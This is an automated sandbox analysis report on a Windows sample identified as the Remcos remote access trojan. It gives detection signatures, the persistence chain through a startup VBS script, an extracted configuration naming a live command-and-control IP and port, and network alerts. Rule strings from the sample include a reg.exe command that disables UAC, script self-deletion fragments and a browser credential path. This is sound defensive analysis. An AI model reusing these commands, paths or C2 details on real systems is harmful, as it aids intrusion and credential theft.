Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rgh99876k7e.exe

Overview

General Information

Sample name:Rgh99876k7e.exe
Analysis ID:1503444
MD5:bd6420aaf066a5b4533598417866bc67
SHA1:cf56376da61f4f34034fa4cc525e708052a5ecd3
SHA256:b8022e8002a8e01a6364fdcc6d53275b6edf3d196e36f0b4c9645de2570cfd48
Tags:exe
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops VBS files to the startup folder
Found API chain indicative of sandbox detection
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Rgh99876k7e.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\Rgh99876k7e.exe" MD5: BD6420AAF066A5B4533598417866BC67)
    • antholite.exe (PID: 6364 cmdline: "C:\Users\user\Desktop\Rgh99876k7e.exe" MD5: BD6420AAF066A5B4533598417866BC67)
      • antholite.exe (PID: 4180 cmdline: C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\hrwdimdtylblmzmsnycdtxncbowjm" MD5: BD6420AAF066A5B4533598417866BC67)
      • antholite.exe (PID: 4332 cmdline: C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\sljoieovmttyofawejoeebhlbcosfxea" MD5: BD6420AAF066A5B4533598417866BC67)
      • antholite.exe (PID: 6188 cmdline: C:\Users\user\AppData\Local\Cocles\antholite.exe /stext "C:\Users\user\AppData\Local\Temp\cnoh" MD5: BD6420AAF066A5B4533598417866BC67)
  • wscript.exe (PID: 2072 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • antholite.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Local\Cocles\antholite.exe" MD5: BD6420AAF066A5B4533598417866BC67)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "192.210.150.26:8787:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NKQ1SM", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
            • 0x6c4b8:$a1: Remcos restarted by watchdog!
            • 0x6ca30:$a3: %02i:%02i:%02i:%03i
            Click to see the 39 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.antholite.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              2.2.antholite.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                2.2.antholite.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  2.2.antholite.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  2.2.antholite.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 43 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , ProcessId: 2072, ProcessName: wscript.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs" , ProcessId: 2072, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Cocles\antholite.exe, ProcessId: 6364, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\antholite.vbs

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Cocles\antholite.exe, ProcessId: 6364, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Suricata Signatures

                  Timestamp:2024-09-03T15:24:07.703909+0200
                  SID:2032777
                  Severity:1
                  Source Port:8787
                  Destination Port:49704
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-09-03T15:24:08.739478+0200
                  SID:2803304
                  Severity:3
                  Source Port:49706
                  Destination Port:80
                  Protocol:TCP
                  Classtype:Unknown Traffic
                  Timestamp:2024-09-03T15:24:06.612948+0200
                  SID:2032776
                  Severity:1
                  Source Port:49704
                  Destination Port:8787
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected
                  Timestamp:2024-09-03T15:26:14.817228+0200
                  SID:2032777
                  Severity:1
                  Source Port:8787
                  Destination Port:49704
                  Protocol:TCP
                  Classtype:Malware Command and Control Activity Detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "192.210.150.26:8787:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-NKQ1SM", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeReversingLabs: Detection: 63%
                  Multi AV Scanner detection for submitted file
                  Source: Rgh99876k7e.exeReversingLabs: Detection: 63%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Rgh99876k7e.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,2_2_004338C8
                  Source: antholite.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407538 _wcslen,CoGetObject,2_2_00407538
                  Source: Rgh99876k7e.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0076DBBE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0073C2A2 FindFirstFileExW,0_2_0073C2A2
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007768EE FindFirstFileW,FindClose,0_2_007768EE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0077698F
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D076
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0076D3A9
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00779642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00779642
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0077979D
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00779B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00779B2B
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00775C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00775C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_0040928E
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C322
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C388
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_004096A0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00408847
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407877 FindFirstFileW,FindNextFileW,2_2_00407877
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0044E8F9 FindFirstFileExA,2_2_0044E8F9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BB6B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419B86
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BD72
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,2_2_008FDBBE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008CC2A2 FindFirstFileExW,2_2_008CC2A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_009068EE FindFirstFileW,FindClose,2_2_009068EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,2_2_0090698F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD076
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_008FD3A9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00909642
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0090979D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,2_2_00909B2B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,2_2_00905C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_100010F1
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_10006580 FindFirstFileExA,2_2_10006580
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008CC2A2 FindFirstFileExW,3_2_008CC2A2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_009068EE FindFirstFileW,FindClose,3_2_009068EE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,3_2_0090698F
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD076
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,3_2_008FD3A9
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00909642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_00909642
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,3_2_0090979D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_008FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,3_2_008FDBBE
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00909B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,3_2_00909B2B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00905C97 FindFirstFileW,FindNextFileW,FindClose,3_2_00905C97
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407CD2

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49704 -> 192.210.150.26:8787
                  Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 192.210.150.26:8787 -> 192.168.2.5:49704
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 192.210.150.26
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49706 -> 178.237.33.50:80
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0077CE44
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
